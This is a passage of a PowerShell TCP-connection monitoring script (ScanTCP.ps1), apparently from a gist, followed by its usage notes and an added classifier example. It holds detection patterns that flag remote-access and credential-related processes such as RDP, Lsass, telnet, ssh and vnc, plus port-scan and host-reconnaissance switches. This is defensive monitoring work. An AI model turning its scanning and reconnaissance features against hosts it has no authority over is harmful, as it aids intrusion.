TCP Established 127.0.0.1 49669 127.0.0.1 49670 ADESv2Svc 4216
TCP Established 127.0.0.1 49670 127.0.0.1 49669 ADESv2Svc 4216
TCP Established 127.0.0.1 49672 127.0.0.1 49673 AcerSysMonitorService 8120
TCP Established 127.0.0.1 49673 127.0.0.1 49672 AcerSysMonitorService 8120
TCP Established 127.0.0.1 58600 127.0.0.1 5141 AQAUserPS 24772
TCP Established 127.0.0.1 58641 127.0.0.1 58995 AcerGAICameraW 25144
TCP Established 127.0.0.1 58995 127.0.0.1 58641 AcerPixyService 16616
TCP Established 192.168.1.5 49457 4.207.247.137 443 svchost 4804
TCP Established 192.168.1.5 63677 185.199.110.133 443 opera 16944
TCP Established 192.168.1.5 63678 185.199.108.154 443 opera 16944
TCP Established 192.168.1.5 63692 140.82.113.25 443 opera 16944
TCP Established 192.168.1.5 63659 52.123.129.14 443 MpDefenderCoreService 22416
-|Scan [4:10]|-
#>
# Retrieve ProcessName(s)
Invoke-ProcessTCPwarnings
Write-Host "-|Scan[" -NoNewline
Write-Host "${i}" -ForegroundColor Yellow -NoNewline
Write-Host ":" -NoNewline
Write-Host "${MaxScans}" -ForegroundColor Red -NoNewline
Write-Host "]$(Get-Date -Format 'HH:mm:ss')|-"
}
Else
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use NETSTAT command to list established TCP connections
.NOTES
Invoking -filter '127.0.0.1' will delete from scan report
all '127.0.0.1' strings found and their corresponding lines
.OUTPUTS
Proto Local Address Foreign Address State PID
----- ------------- --------------- ----------- ---
TCP 127.0.0.1:5141 127.0.0.1:58600 ESTABLISHED 4296
TCP 127.0.0.1:49669 127.0.0.1:49670 ESTABLISHED 4216
TCP 127.0.0.1:49670 127.0.0.1:49669 ESTABLISHED 4216
TCP 127.0.0.1:49672 127.0.0.1:49673 ESTABLISHED 8120
TCP 127.0.0.1:49673 127.0.0.1:49672 ESTABLISHED 8120
TCP 127.0.0.1:58600 127.0.0.1:5141 ESTABLISHED 24772
TCP 127.0.0.1:58641 127.0.0.1:58995 ESTABLISHED 25144
TCP 127.0.0.1:58995 127.0.0.1:58641 ESTABLISHED 16616
TCP 192.168.1.5:49457 4.207.247.137:443 ESTABLISHED 4804
TCP 192.168.1.5:63025 140.82.114.26:443 ESTABLISHED 16944
TCP 192.168.1.5:63039 13.69.239.68:443 ESTABLISHED 18212
-|Scan[2:8]|-
#>
## Use netstat command to display established TCP connections
# findstr /V "$Filter" - deletes from netstat output every line matching $Filter (default "0.0.0.0:", used to drop IPv6 addr).
$NetStats = Netstat -ano|findstr "ESTABLISHED"|findstr /V "$Filter"
# Display results OnScreen
Write-Host " Proto Local Address Foreign Address State PID" -ForegroundColor Yellow
Write-Host " ----- ------------- --------------- ----------- ---"
echo $NetStats
echo ""
Write-Host "-|Scan[" -NoNewline
Write-Host "${i}" -ForegroundColor Yellow -NoNewline
Write-Host ":" -NoNewline
Write-Host "${MaxScans}" -ForegroundColor Red -NoNewline
Write-Host "]$(Get-Date -Format 'HH:mm:ss')|-"
# Append to logfile?
If($Logfile.IsPresent)
{
echo "`n Proto Local Address Foreign Address State PID" >> $LogName
echo " ----- ------------- --------------- ----------- ---" >> $LogName
echo $NetStats >> $LogName
}
}
# Scan Type (manual|automatic)
Invoke-ScanTypes
## Do not clear screen if $i ...
# reaches the max of MaxScans ($MaxScans)
If($i -NotMatch "$MaxScans")
{
Clear-Host
}
}
Elseif($Invoke -iMatch "^(NetTCPConnection)$")
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use Get-NetTCPConnection CmdLet to list established TCP connections
.NOTES
-Invoke 'NetTCPConnection' together with -Process switch will
display the ProcessName associated with the TCP connection
Invoking -filter '127.0.0.1' will delete from scan report
all '127.0.0.1' strings found and their corresponding lines
.OUTPUTS
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
TCP State LocalAddress LocalPort RemoteAddress RemotePort HostName ProcessName OwningProcess
--------- ------------ --------- ------------- ---------- -------- ----------- -------------
Established 192.168.1.5 62082 140.82.113.26 443 lb-140-82-113-26-iad.github.com opera 776
Established 127.0.0.1 60919 127.0.0.1 58995 Skynet AcerGAICameraW 6880
Established 127.0.0.1 60904 127.0.0.1 5141 Skynet AQAUserPS 3404
Established 127.0.0.1 58995 127.0.0.1 60919 Skynet AcerPixyService 4548
Established 127.0.0.1 49673 127.0.0.1 49672 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49672 127.0.0.1 49673 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49670 127.0.0.1 49669 Skynet ADESv2Svc 4508
Established 127.0.0.1 49669 127.0.0.1 49670 Skynet ADESv2Svc 4508
Established 192.168.1.5 49412 4.207.247.139 443 svchost 4964
Established 127.0.0.1 5141 127.0.0.1 60904 Skynet AcerQAAgent 4576
-|Scan[5:20]|-
#>
$CmdLetAppl = "NetTCPConnection"
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "List ESTABLISHED " -ForegroundColor Green -NoNewline
Write-Host "$IP " -ForegroundColor Yellow -NoNewline
Write-Host "TCP Connections" -ForegroundColor Green
# Get NetAdaptor settings
Get-NetAdapter|Select-Object Name,Status,LinkSpeed,ifDesc|
Format-Table -AutoSize|Out-String -Stream|Select-Object -First 5
If($Process.IsPresent)
{
# List established TCP connections
$NetStats = Get-NetTCPConnection -State ESTABLISHED|
Select-Object -Property @{name='TCP State';expression={'Established'}},LocalAddress,LocalPort,RemoteAddress,RemotePort,@{name='HostName';expression={(Resolve-DnsName $_.RemoteAddress).NameHost}},@{Name="ProcessName";Expression={(Get-Process -PId $_.OwningProcess).ProcessName}},OwningProcess|
Where-Object{$_ -iNotMatch "($Filter)"}
# BallonTip TCP connection warnings
If($WarnMeOf -iNotMatch "^(NULL)$")
{
<#
.NOTES
pops up one balloon tip warning each time a TCP connection
related to the given process name is found active on the device
#>
ForEach($_Processes_ in $NetStats)
{
# Get all process names from $NetStats variable
$ProcName = ($_Processes_|findstr /C:"ProcessName") -replace 'ProcessName : ',''
# Invoke BallonTip warning that process name has found connecting with TCP
If($ProcName -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
# Get Ports from $NetStats variable OwningProcess
$LocalPor = ($_Processes_|findstr /C:"LocalPort") -replace 'LocalPort : ',''
$RemotePo = ($_Processes_|findstr /C:"RemotePort") -replace 'RemotePort : ',''
$ProcPPID = ($_Processes_|findstr /C:"OwningProcess") -replace 'OwningProcess : ',''
Invoke-BallonTipWarnings
}
} # End of ForEach()
}
# ProcessName detail Info
If($ProcessInfo.IsPresent)
{
<#
.OUTPUTS
ProcessName Description DLLs Loaded
----------- ----------- -----------
opera Opera GX Internet Browser opera.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll opera_elf.dll bcryptprimitives.dll opera_bro...
AQAUserPS
AcerPixyService
AcerGAICameraW Acer GAI Camera Windows AcerGAICameraW.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll USER32.dll win32u.dll WINHTTP.dll A...
AcerSysMonitorService
AcerSysMonitorService
ADESv2Svc
ADESv2Svc
svchost
AcerQAAgent
#>
Start-Sleep -Seconds 1
# PROCESSES INFO TABLE
$Proctable = New-Object System.Data.DataTable
$Proctable.Columns.Add("ProcessName")|Out-Null
$Proctable.Columns.Add("Description")|Out-Null
$Proctable.Columns.Add("DLLs Loaded")|Out-Null
ForEach($tetrys in $NetStats)
{
# Get PID of all processes found in $Netstats
$PPID = ($tetrys|findstr /C:"OwningProcess") -replace 'OwningProcess : ',''
$DLLSLoaded = (Get-Process -Id $PPID|Select *).modules.modulename
$ProcNa = (Get-Process -Id $PPID).Name
$ProcDe = (Get-Process -Id $PPID).Description
$ProcId = (Get-Process -Id $PPID).EnableRaisingEvents
## Adding values to output DataTable!
$Proctable.Rows.Add("$ProcNa", ## name
"$ProcDe", ## description
"$DLLSLoaded" ## DLLS LOADED
)|Out-Null
} # End of ForEach()
}
# Append to logfile?
If($Logfile.IsPresent)
{
echo $NetStats|Format-Table -AutoSize >> $LogName
If($ProcessInfo.IsPresent)
{
echo $Proctable|Format-Table -AutoSize >> $LogName
}
}
}
Else
{
# List established TCP connections only
$NetStats = Get-NetTCPConnection -State ESTABLISHED|
Select-Object -Property @{name='TCP State';expression={'Established'}},LocalAddress,LocalPort,RemoteAddress,RemotePort,@{name='HostName';expression={(Resolve-DnsName $_.RemoteAddress).NameHost}},OwningProcess|
Where-Object{$_ -iNotMatch "($Filter)"}
# Append to logfile?
If($Logfile.IsPresent)
{
echo $NetStats|Format-Table -AutoSize >> $LogName
}
}
echo ""
# Display results OnScreen
$NetStats|Format-Table -AutoSize|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match '\s+127.0.0.1\s+')
{
@{ 'ForegroundColor' = 'Gray' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
# ProcessInfo TABLE output
If($ProcessInfo.IsPresent)
{
Start-Sleep -Milliseconds 1400
$Proctable|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
## Invoke schedule tasks
Invoke-ScheduleTasks
}
Write-Host "-|Scan[" -NoNewline
Write-Host "${i}" -ForegroundColor Yellow -NoNewline
Write-Host ":" -NoNewline
Write-Host "${MaxScans}" -ForegroundColor Red -NoNewline
Write-Host "]$(Get-Date -Format 'HH:mm:ss')|-"
# Scan Type (manual|automatic)
Invoke-ScanTypes
## Do not clear screen if $i ...
# reaches the max of MaxScans ($MaxScans)
If($i -NotMatch "$MaxScans")
{
Clear-Host
}
}
}
## TCP Statistics
Invoke-TCPStats
## BalloonTip
Invoke-BallonTip
If($Logfile.IsPresent)
{
Write-Host "`nLogfile: " -NoNewline
Write-Host "$pwd\$LogName" -ForegroundColor Green
}
echo ""

r00t-3xp10it commented Sep 18, 2025

List Established TCP connections [ in loop ]


Download cmdlet

iwr -uri "https://gist.githubusercontent.com/r00t-3xp10it/586346116ddbeeeaad4e9775b123d549/raw/5270f0c7b19847e29c7f145b373e0d2de93f46d2/ScanTCP.ps1" -OutFile "ScanTCP.ps1"|Unblock-File

CmdLet Parameters\Switches Description

| Parameter | Switch | Description | Default Value |
| --- | --- | --- | --- |
| invoke | - | Scan for active TCP connections using: netstat OR Get-NetTCPConnection | NetTCPConnection |
| scantype | - | The type of CmdLet scan [loop] to use: automatic OR manual | automatic |
| scaneach | - | Scan for TCP connections each xx seconds: 3 (min) OR 15 (max) | 6 |
| maxscans | - | The max number of TCP scans to perform: 1 (min) OR 80 (max) | 10 |
| filter | - | Delete from scan reports all strings: 0.0.0.0: (IPv6 addresses) | 0.0.0.0: |
| - | logfile | Switch that appends scans to TCPreport_19_27_50_2025.txt | not active |
| - | process | Switch to retrieve the process name associated with TCP connection | not active |
| - | processinfo | Print TCP connection processName detail info + loaded DLLs + Today's schedule tasks | not active |
| warnmeof | - | Pops up balloon tip warning that process name was found active | NULL |
| - | dns | Switch that retrieves Lhost DNS resolver cache entries [ipv4\|ipv6] | not active |
| - | dll | Switch to search for DLLs loaded by running processes | not active |
| - | geolocation | Switch that retrieves Lhost geolocation with http://ipinfo.io | not active |
| - | mitre | Switch that searches for possible MITRE ATT&CK vulnerabilities | not active |
| - | portscan | Switch that searches for TCP most common [open] ports | not active |

EXAMPLES

Get-Help

Get-Help .\ScanTCP.ps1 -full

List TCP connections using CmdLet default settings

.\ScanTCP.ps1

List TCP connections in verbose mode (display ProcessNames and PID)

 .\ScanTCP.ps1 -Invoke NetTCPConnection -Process

List TCP connections in verbose mode (4 scans max) + filter '127.0.0.1'

 .\ScanTCP.ps1 -Invoke NetTCPConnection -MaxScans 4 -Process -filter '127.0.0.1'

List TCP connections invoking NetTCPConnection (3 scans max) +append results to logfile

.\ScanTCP.ps1 -Invoke NetTCPConnection -MaxScans 3 -LogFile

List TCP connections invoking Netstat command, scan 3 times with 2 seconds delay

.\ScanTCP.ps1 -Invoke Netstat -MaxScans 3 -ScanEach 2

List TCP connections invoking netstat command, scan 5 times (press keyboard key for new scan)

.\ScanTCP.ps1 -Invoke netstat -MaxScans 5 -ScanType manual

Setting BallonTip Warnings

Executing: -invoke 'netstat' -process -warnmeof 'svchost'
Description: Pops up one balloon tip warning every time one TCP connection related to the process svchost is found active on the device
Note: We can now minimize the scantcp terminal console and still receive tcp warnings [ BalloonTip ]

.\ScanTCP.ps1 -invoke 'netstat' -process -warnmeof 'SVCHOST' 

Executing: -invoke 'NetTCPConnection' -process -warnmeof 'SVCHOST'
Description: In the next example the SVCHOST process was found loading RDPCORETS.DLL [ Mitre T1021 warning ]
Note: the TermService service needs to be running and rdpcorets.dll loaded by svchost for the device to be vulnerable
Note: Invoking the -filter '127.0.0.1' parameter deletes from outputs the full line containing the selected string

.\ScanTCP.ps1 -invoke 'NetTCPConnection' -process -warnmeof 'SVCHOST' -filter '127.0.0.1'

Executing: -invoke 'netstat' -process -processInfo (print processes loaded DLLs) -warnmeof 'AcerGAICameraW '
Description: Print process names associated with TCP connection + process loaded DLLs + warnmeof AcerGAICameraW connection

.\ScanTCP.ps1 -invoke 'netstat' -process -ProcessInfo -warnmeof 'AcerGAICameraW'  

Some tasks require admin privileges to be able to extract info from service\process (print DLLs loaded)


Without administrator privileges (print DLLs loaded)




STANDALONE SWITCHES (can not be used together with other parameters)

Search for DLLs loaded by running processes

.\ScanTCP.ps1 -DLL

List DNS resolver cache

.\ScanTCP.ps1 -dns

Search for TCP high risk [open] ports

.\ScanTCP.ps1 -PortScan

List hostname geolocation

.\ScanTCP.ps1 -GeoLocation

Search for possible MITRE vulnerabilities

.\ScanTCP.ps1 -mitre
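The colour rules and the -warnmeof balloon tip described above both flag a connection by matching its process name against a fixed list. The following is an added example, not code from the ScanTCP.ps1 gist or its author: it reuses the gist's three process-name patterns (yellow watch list, red high-risk list, green Defender list) but returns each established connection as an object carrying a Tier property, so the triage can be exported, filtered or forwarded to a SIEM instead of being read off coloured console text. The function names Get-ConnectionTier and Get-FlaggedTcpConnection, the tier names, and the sample records at the end are mine; the sample is constructed so the classifier can be run offline.

```powershell
# Added example (not part of the ScanTCP.ps1 gist). The three patterns below
# are the ones the gist uses for its yellow / red / green colour rules.
$script:WatchList = 'ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost'
$script:HighRisk  = 'LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System'
$script:Defender  = 'MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService'

function Get-ConnectionTier {
    <#
    Pure classifier (my own helper): one record with ProcessName, LocalAddress and
    RemoteAddress in, one tier name out. Unlike the gist's on-screen rules, the
    operator's -WarnMeOf name is tested first so an explicitly watched process is
    never downgraded to the yellow tier (svchost appears on that list too).
    #>
    param(
        [Parameter(Mandatory)] $Connection,
        [string] $WarnMeOf = 'NULL'   # 'NULL' mirrors the gist's "no extra name" default
    )
    $name = [string]$Connection.ProcessName
    # Escape the operator-supplied name so it is matched literally, not as a regex
    if ($WarnMeOf -ne 'NULL' -and $name -imatch [regex]::Escape($WarnMeOf)) { return 'WarnMeOf' }
    if ($name -imatch "($script:HighRisk)")  { return 'HighRisk' }
    if ($name -imatch "($script:WatchList)") { return 'Watch' }
    if ($name -imatch "($script:Defender)")  { return 'Defender' }
    if ($Connection.RemoteAddress -in @('127.0.0.1', '::1') -or
        $Connection.LocalAddress  -in @('127.0.0.1', '::1')) { return 'Loopback' }
    return 'Normal'
}

function Get-FlaggedTcpConnection {
    <#
    Live query (my own helper): same data source as the gist, Get-NetTCPConnection,
    but every established connection comes back as an object carrying its Tier,
    and -Filter is applied to the rendered record the way the gist's -filter is.
    Needs a Windows host; process names of PIDs we cannot open become 'Unknown'.
    #>
    param(
        [string] $WarnMeOf = 'NULL',
        [string] $Filter   = '0.0.0.0:'
    )
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue | ForEach-Object {
        $proc  = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        $pname = if ($proc) { $proc.ProcessName } else { 'Unknown' }
        $rec = [pscustomobject]@{
            LocalAddress  = $_.LocalAddress
            LocalPort     = $_.LocalPort
            RemoteAddress = $_.RemoteAddress
            RemotePort    = $_.RemotePort
            ProcessName   = $pname
            OwningProcess = $_.OwningProcess
        }
        $rec | Add-Member -NotePropertyName Tier -NotePropertyValue (Get-ConnectionTier -Connection $rec -WarnMeOf $WarnMeOf)
        $rec
    } | Where-Object { ($_ | Out-String) -inotmatch [regex]::Escape($Filter) }
}

# Constructed sample records (not captured from a real host) so the classifier can
# be exercised offline; Get-FlaggedTcpConnection itself needs a live Windows host.
$sample = @(
    [pscustomobject]@{ ProcessName = 'opera';       LocalAddress = '192.168.1.5'; RemoteAddress = '140.82.113.26'; RemotePort = 443 }
    [pscustomobject]@{ ProcessName = 'svchost';     LocalAddress = '192.168.1.5'; RemoteAddress = '4.207.247.137'; RemotePort = 443 }
    [pscustomobject]@{ ProcessName = 'MsMpEng';     LocalAddress = '192.168.1.5'; RemoteAddress = '52.123.129.14'; RemotePort = 443 }
    [pscustomobject]@{ ProcessName = 'AcerQAAgent'; LocalAddress = '127.0.0.1';   RemoteAddress = '127.0.0.1';     RemotePort = 58600 }
    [pscustomobject]@{ ProcessName = 'mstsc';       LocalAddress = '192.168.1.5'; RemoteAddress = '192.168.1.20';  RemotePort = 3389 }
)
$sample |
    Select-Object ProcessName, RemoteAddress, RemotePort,
        @{ Name = 'Tier'; Expression = { Get-ConnectionTier -Connection $_ -WarnMeOf 'svchost' } } |
    Format-Table -AutoSize
```

On a live host the objects compose with the usual cmdlets, for example `Get-FlaggedTcpConnection -WarnMeOf 'svchost' | Where-Object Tier -ne 'Normal' | Export-Csv flagged.csv -NoTypeInformation`, which keeps a record of every flagged connection per scan instead of relying on the console history. As in the gist, the patterns are substring matches, so a name such as "ssl" or "System" inside a longer process name will also raise the tier; tighten the patterns (for example by anchoring with `^...$`) if that produces too many hits in your environment.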
